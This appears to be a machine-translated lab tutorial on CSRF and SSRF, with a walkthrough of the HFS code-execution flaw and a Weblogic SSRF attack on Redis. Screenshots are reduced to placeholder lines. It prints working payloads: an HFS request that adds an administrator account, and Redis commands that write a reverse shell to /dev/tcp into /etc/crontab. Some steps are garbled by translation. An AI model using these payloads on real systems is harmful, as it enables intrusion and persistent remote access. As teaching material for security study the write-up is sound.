CSRF and SSRF

CSRF and SSRF

CSRF cross-site request forgery

Capture data packets by modifying data

Insert picture description here

Extract the modified data message

Insert picture description here

By establishing a data package on a server on the external network

Insert picture description here

When Admin signed in careless access to just grab the data packet modification information on the website, it will trigger the malicious code

Insert picture description here


information is modified

Insert picture description here

Detect if there is CSRF

Use the tool Burpsuit to
capture the modified information packet and send it to Burpsuit's CSRF poc module.

Insert picture description here


Modify some information, and copy and copy

Insert picture description here


it to the website of the

Insert picture description here


external server . When you click the submit of the external server, the information is modified

Insert picture description here


successfully. modify

Insert picture description here

Defense plan

Random Token and Same Origin Policy

Insert picture description here


Random Token is equivalent to adding an ID card to each data packet. Each data packet is different. Only the real Token data packet will be executed. And brute force cracking of the Token value is not feasible, the number is too long.

Insert picture description here


Same-origin strategy (weak defensive ability, can be modified by capturing data packets)

Insert picture description here

SSRF server request forgery

Insert picture description here
Insert picture description here

The most common is to upload remotely,
use the server itself to request a remote address,

Insert picture description here


display the image code

Insert picture description here

The server requests its own mysql database and

Insert picture description here


successfully echoes the Mysql information.

Insert picture description here


This can be used to detect the internal network.

Range host file
file://host file path

Insert picture description here


Successfully displayed

Insert picture description here

The protocol that can be used on the corresponding website

Insert picture description here

HFS vulnerability recurrence

http file downloader, had been critical code execution vulnerability
HFS open port 8080

Insert picture description here


to successfully probe

Insert picture description here


inquiries through the Internet to the existence of loopholes in

Insert picture description here


the attack Playload

http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.} 
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}

Add user hack, password is 123

http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.} 

Add a payload

Insert picture description here

ssrf combat

The exploit environment is the Weblogic SSRF vulnerability, and the redis database
crontab is the scheduled task file of redis.

Insert picture description here


By visiting the text Weblogic website: http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp to capture packets

Insert picture description here


Access the redis database of the intranet host

Insert picture description here


The rdis database can be accessed without authorization. The
overall idea:

Insert picture description here

Bounce to the local port: 172.21.22.2:777 The
command is as follows:

Reverse shell command: set xx "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.21.22.2:777 0>&1\n\n\n\n"
put the shell Write to the root directory of the website: config set dir /etc
Write file name: config set dbfilename crontab
execute command: save

Url-encode the space and add it to the data packet.

Insert picture description here


Local success is monitored

Insert picture description here


successfully! ! !